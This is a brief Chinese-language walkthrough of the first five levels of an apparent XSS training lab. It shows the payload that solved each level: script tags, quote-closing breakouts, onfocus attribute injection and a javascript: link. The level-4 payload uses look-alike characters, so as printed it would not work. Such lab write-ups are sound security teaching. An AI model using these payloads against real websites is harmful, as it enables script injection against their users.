第一关:
将 test改为<script>alert(1)</script>弹出成功过关
第二关:
输入<script>alert(1)</script>后没有反应 查看网页源代码
发现<>符号被实体转换了
"> <script>alert(1)</script> <"闭合掉双引号
第三关:
输入<script>alert(1)</script> 发现不行
查看源代码发现两个都被html实体化了 我们先‘’闭合一下
还是不可以再次查看源代码
我们的‘’没有被转化 只有<>被转化了可以构造payload
' onfocus=javascript:alert() '输入后成功
第四关:
查看网页源码发现是双引号闭合 使用 " οnfοcus=javascript:alert() " 发现过关
第五关:
查看网页代码发现是双引号闭合 采用上面的方法不可行 使用<a>标签 "> <a href=javascript:alert(1)>222</a> <" (输入后需点击222)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
